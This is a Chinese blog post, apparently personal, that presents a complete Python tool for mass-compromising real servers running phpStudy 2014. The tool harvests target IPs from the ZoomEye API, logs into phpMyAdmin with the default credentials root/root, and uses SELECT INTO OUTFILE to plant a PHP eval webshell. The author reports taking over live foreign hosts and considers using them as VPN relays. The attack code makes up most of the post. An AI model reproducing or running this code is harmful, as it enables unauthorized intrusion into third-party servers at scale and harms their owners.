使用Python批量爬取WebShell

还在用爬虫爬一些简单的数据?太没意思了!我们来用爬虫爬WebShell!

0. 引子

前些天访问一个平时经常访问的网站,意外的发现这个站出了问题,首页变成了phpStudy 探针 2014,大概是这样的:
demo
查看了一下之后发现,在这个探针的底部,有一个检测MySQL数据库连接检测的功能:
demo2
可以使用这个功能,检测这台主机上的MySQL数据库的账号密码。
然后我注意到了低栏里写了phpMyAdmin
demo3
于是就在域名后面直接加上了/phpmyadmin进行访问,没想到,真的能访问。
demo4
使用弱口令root/root成功登陆之后,我就有了想法:
MySQL具有导出数据的功能into outfile,那应该可以直接导出一个一句话木马出来,然后使用菜刀连接吧。绝对路径也在phpStudy 探针 2014那个页面能看到,那就开始试试呗。

1. 第一个WebShell

成功登陆phpMyAdmin之后,使用其SQL功能,导出一句话木马。
demo5
使用菜刀连接。
demo6
拿到服务器。
demo7

2. 自动化操作

以上的操作都是手工操作,如果希望用爬虫来获取,必须把手工操作简化成程序自动运行。
以上总共分为5步,其分别为:

  1. 使用phpStudy 探针上的MySQL检测工具,检测是否是弱口令,如果是的话,记录下绝对路径
  2. 检测是否存在目录/phpmyadmin
  3. 登陆phpmyadmin
  4. 使用phpmyadminSQL功能,将一句话木马导出到绝对路径
  5. 使用菜刀连接【这个不用自动化

考虑到人生这么短,世界这么大,我这里使用Python作为主要编程语言,版本为3.x。
用到的库主要有HTML解析库BeautifulSoup和网络请求神库requests。
以下是编程的总体思路,为了简单起见,暂时没有用到多线程,多进程和协成方面的东西。代码会附在最后。

1. 检测弱口令

函数签名:MySQLConnectCheck(ip)
实现功能:根据提交上来的参数ip,进行检测其对应的MySQL服务是否为弱口令,如果是,先将ip记录,再获取绝对路径,并将其保存在一个变量内以供接下来使用。
实现思路:

  1. 首先抓包,得到检测弱口令时请求的页面以及提交的参数:
    demo9
  2. 发现提交过一个请求后,返回的HTML页面内会根据结果生成相应的弹窗JS代码
    demo10
  3. 根据1,2就可以进行编码工作

2. 检测phpmyadmin目录

函数签名:PhpMyAdminCheck(ip)
实现功能:根据参数ip,检测其对应的phpmyadmin页面时候存在。
实现思路:
使用requests库对指定url进行访问,监测其返回值是否为200。

3. 模拟登陆phpmyadmin

函数签名:LoginPhpMyAdmin(phpMyAdminURL)
实现功能:根据参数phpMyAdminURL,对指定页面的phpmyadmin进行登陆,获取到登陆后得到的token和Cookie
实现思路:
这里有点坑,先不说思路了,说说坑点。
通过开发者工具抓包得到提交的参数里有一个token,这个token和登陆之后后端返回给我的token值看上去是相同的,所以我一开始就直接用这个token进行下一步操作,结果没想到的是怎么都无法操作。后来我发现,在登陆的时候不提交token也丝毫不影响获取到Cookie,反而token会随着登陆成功的页面一起返回回来…
……以上说的有点乱,但是如果有人真正尝试过模拟登陆的话,可能会和我有共鸣吧。
思路其实就是模拟一个form表单的提交,要注意的是,返回值是302的时候python的requests库会自动follow redirect,可以在发送请求的时候设置allow_redirect = False或者对得到的响应取第一个history,response.history[0],具体的在我的代码里可以体现出来。

4. 执行SQL语句

函数签名:ExecuteSQL(cookies, phpMyAdminURL, token)
实现功能:执行SQL语句,导出一句话木马
实现思路:也是一个form表单提交,通过开发者工具可以很轻易的得到提交的数据。这里只要token和Cookie正确的话没有丝毫坑点。

5. 编码工作基本完成

到这里,整体的实现框架就完成了。剩下的工作就是获取到足够的目标ip,来进行批量扫描检测。

3. 批量获取IP

有三种方法批量获取IP

  1. 使用钟馗之眼API批量获取
  2. 使用撒旦搜索API批量获取
  3. 使用搜索引擎查找关键字

因为我个人对钟馗之眼和撒旦搜索比较熟悉,所以就使用前2种方法了。
对于1,思路是:

  1. 访问钟馗之眼API文档,根据其提供的验证方式获取到Access_token
  2. 使用主机设备搜索接口,搜索条件为phpStudy 2014,或者phpStudy 2014 Country:CN进行获取,我个人测试,可以获取到1-400页的内容,大概有4000个IP
  3. 使用python对获取到的ip进行整理,保留其ip地址
    代码很简略,如下:
import requests

headers = {"Authorization":"X"}
url = "https://api.zoomeye.org/host/search?query=phpStudy+2014&page="
f = open("ip.txt", "a+")
for i in range(1,401):
    print(i)
    target = url + str(i)
    try:
        response = requests.get(target, timeout = 1, headers = headers)
        print(response.text)
        matches = response.json()["matches"]
        for result in matches:
            ip = result["ip"]
            f.write(ip + "\n")
    except BaseException as e:
        continue
f.close()

对于撒旦搜索,想要获取到大量数据还有些麻烦,暂时不提了。

4. 开始爬取webshell

在此之前,需要对我们的代码进行加工。其思路是读取ip.txt内的ip地址数据,构造成http://ip的形式,并循环调用MySQLConnectCheck(ip)方法。

5. 运行截图

demo11
demo12
效果还是不错的!

6. 感想

这种漏洞其实比较简单,能获取到的webshell数量比较少。
但是使用爬虫获取这类东西可比爬一些简单的数据有意思多了,能得到的成就感也更大。
用菜刀连接之后,发现有很多前人已经来过了…目录下面各种一句话木马…
也算是得到了一些美国、香港的IP,不知道可不可以利用他们搭一个VPN呢,嘿嘿。

7. 最后,上代码

代码写的有些乱,见谅

import requests
import re
from bs4 import BeautifulSoup

def writeMySQLOKIp(ip):
    with open("mysql.txt", "a") as f:
        f.write(ip+"\n")

def writeShellIp(ip):
    with open("shell.txt", "a") as f:
        f.write(ip + "\n")

def MySQLConnectCheck(ip):
    global location
    data = {
        "host": "localhost", 
        "port": "3306", 
        "login": "root", 
        "password": "root", 
        "act": "MySQL检测", 
        "funName": ""
    }
    action = "/l.php"
    try:
        formAction = ip + action
        response = requests.post(formAction, data = data, timeout = 5)
        if response.ok:
            print(ip, "访问成功")
            body = response.text
            htmlBody = BeautifulSoup(body, "html.parser")
            if htmlBody.select("script")[0].string.find("正常") != -1:
                print(ip, "数据库连接成功")
                trs = htmlBody.select("table")[0].select("tr")
                location = trs[-2].select("td")[-1].string
                writeMySQLOKIp(ip)
                PhpMyAdminCheck(ip)
            else:
                print(ip, "数据库连接失败")
        else:
            print(ip, "访问失败")
    except BaseException as e:
        print(ip, "访问错误")
        PhpMyAdminCheck(ip)

def PhpMyAdminCheck(ip):
    phpMyAdminURL = ip + "/phpmyadmin"
    try:
        response = requests.get(phpMyAdminURL, timeout=5)
        if response.ok:
            print(ip, "phpmyadmin连接成功")
            LoginPhpMyAdmin(phpMyAdminURL)
        else:
            print(ip, "phpmyadmin连接失败")
    except BaseException as e:
        print(ip, "error")

def LoginPhpMyAdmin(phpMyAdminURL):
    try: 
        data = {"pma_username": "root", "pma_password": "root", "server": "1", "lang": "en"}
        response = requests.post(phpMyAdminURL+"/index.php", data=data, timeout=5)
        # 得Token
        pat = re.compile(r"var token = '(\S*)'")
        token = re.findall(pat, response.text)[0]

        # 得Cookie
        setCookie = response.history[0].headers["set-cookie"]
        pattern = re.compile(r"p[\w-]*=[\w%]*;")
        cookies = ' '.join(re.findall(pattern, setCookie))
        print(phpMyAdminURL, "phpMyAdmin登陆成功")
        ExecuteSQL(cookies, phpMyAdminURL, token)
    except BaseException as e:
        print(phpMyAdminURL, "phpMyAdmin登陆失败")

def ExecuteSQL(cookies, phpMyAdminURL, token):
    global location
    try:
        sql = "select '<?php @eval($_POST[setting])?>' into outfile '" + location + "/setting.php'"
        data = {
            "is_js_confirmed":"0",
            "db": "mysql",
            "token": token,
            "pos": "0",
            "prev_sql_query": "",
            "goto": "db_sql.php",
            "message_to_show": "123",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "1",
            "ajax_request": "true"
        }
        headers = {"Cookie": cookies}
        response = requests.post(phpMyAdminURL+"/import.php", data=data, headers=headers, timeout=3).json()
        if response["success"]:
            print(phpMyAdminURL+"/setting.php", "webshell植入成功, pwd:setting");
            writeShellIp(phpMyAdminURL+"/setting.php")
        else:
            print(phpMyAdminURL, "webshell植入失败, reason:", response["error"]);
    except BaseException as e:
        print(phpMyAdminURL, "error")
    
def main():
    with open("ip.txt", "r") as f:
        for line in f:
            ip = line.strip("\n")
            target = "http://" + ip
            try:
                MySQLConnectCheck(target)
            except BaseException as e:
                print(e)
                continue

location = ""
if __name__ == "__main__":
    main()